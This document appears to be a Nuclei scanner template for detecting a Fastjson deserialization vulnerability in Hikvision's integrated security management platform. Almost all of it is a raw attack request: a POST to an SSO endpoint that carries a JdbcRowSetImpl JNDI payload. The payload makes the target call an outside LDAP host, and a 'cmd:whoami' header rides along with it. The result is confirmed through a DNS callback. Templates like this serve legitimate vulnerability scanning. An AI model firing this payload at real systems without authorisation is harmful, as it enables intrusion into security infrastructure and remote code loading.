id: hikvision_fastjson

info:
  name: 海康综合安防平台_fastjson漏洞
  author: Str1am
  severity: critical
  tags: hikvision,fastjson

requests:
  - raw:
      - |
        POST /bic/ssoService/v1/applyCT HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
        Cookie: JSESSIONID=aOpz-JaxJNe-Z6brtkmPgX5uV0lIOdPIGiewyLTy
        Upgrade-Insecure-Requests: 1
        Content-Type: application/json
        Content-Length: 198
        cmd:whoami


        {"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://{{interactsh-url}}","autoCommit":true}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"